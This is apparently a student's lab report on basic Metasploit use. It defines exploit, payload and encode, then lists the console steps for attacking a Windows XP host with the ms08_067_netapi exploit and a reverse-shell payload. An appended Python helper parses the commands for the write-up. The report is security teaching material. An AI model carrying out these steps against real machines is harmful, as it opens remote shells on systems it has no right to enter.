2017-2018-2 20155310 "Network Countermeasure Technology" Exp5: MSF Basic Application
Answers to the basic questions
Explain in your own words what exploit, payload and encode mean
Exploit: the use of a security hole in a system, application or service by an attacker or penetration tester.
Payload: the attack payload, such as a backdoor or other attack code.
Encode: encoding, that is, disguising our program or code.
Experimental content
An active attack exercise, such as ms08_067
1. Start the msf terminal: msfconsole
2. Use the search command to find the module that corresponds to the vulnerability: search ms08_067
3. The path of the penetration attack module is "exploit/windows/smb/ms08_067_netapi", which consists of four parts: module type, target platform, target service and module name.
use exploit/windows/smb/ms08_067_netapi
1. View the available payloads:
show payloads
2. Select the attack payload:
set payload generic/shell_reverse_tcp
3. View the configuration items required to configure penetration attacks:
show options
4. View the target platforms that the penetration attack module can successfully attack:
show targets
5. Use show payloads to see the payloads available to us.
6. Pick an available attack payload, generic/shell_reverse_tcp, and set it with set payload generic/shell_reverse_tcp.
7. Use show options to view the parameters that need to be set.
• Here you need to set RHOST (the target IP) and LHOST (Kali's IP); set each one with the command: set <parameter name> <parameter value>
8. Set the target option (for example, my target system is Windows XP Simplified Chinese SP2, so choose 10).
• After confirming that the parameter settings are correct, use the exploit command to start the attack.
9. After the attack succeeds, a shell on the target machine is obtained and can be used to operate it.
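For writing up the lab record, the following added example (not part of the original report) parses a transcript of the console commands above into a structured summary, splitting the module path into the four parts described in step 3. The function names and the 192.0.2.x addresses are constructed for illustration; paths with fewer than four parts (such as exploit/multi/handler) are handled by leaving the missing fields empty.

```python
import shlex

# Module types Metasploit uses as the first path component.
MODULE_TYPES = {"exploit", "auxiliary", "post", "payload", "encoder", "nop", "evasion"}

def split_module_path(path):
    """Split a module path into type / platform / service / name (step 3).

    Shorter paths leave missing fields as None; extra middle parts are
    folded into 'service'.
    """
    parts = path.strip("/").split("/")
    if parts[0] not in MODULE_TYPES or len(parts) < 2:
        raise ValueError(f"not a typed module path: {path!r}")
    middle = parts[1:-1]
    return {
        "type": parts[0],
        "platform": middle[0] if middle else None,
        "service": "/".join(middle[1:]) or None,
        "name": parts[-1],
    }

def summarize_session(transcript):
    """Turn recorded console commands into one record for the lab report."""
    record = {"module": None, "payload": None, "options": {}}
    for line in transcript.splitlines():
        words = shlex.split(line)
        if not words:
            continue
        cmd = words[0].lower()
        if cmd == "use" and len(words) == 2:
            record["module"] = split_module_path(words[1])
        elif cmd == "set" and len(words) >= 3:
            key, value = words[1], " ".join(words[2:])
            if key.lower() == "payload":
                record["payload"] = value
            else:
                record["options"][key.upper()] = value
    return record  # search/show/other commands are ignored

# Constructed transcript: commands from this write-up, placeholder addresses.
SAMPLE = """\
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.0.2.10
set LHOST 192.0.2.20
set target 10
"""
```

Calling summarize_session(SAMPLE) returns the module's four parts, the chosen payload, and the options that were set, which can be pasted into the report next to the screenshots.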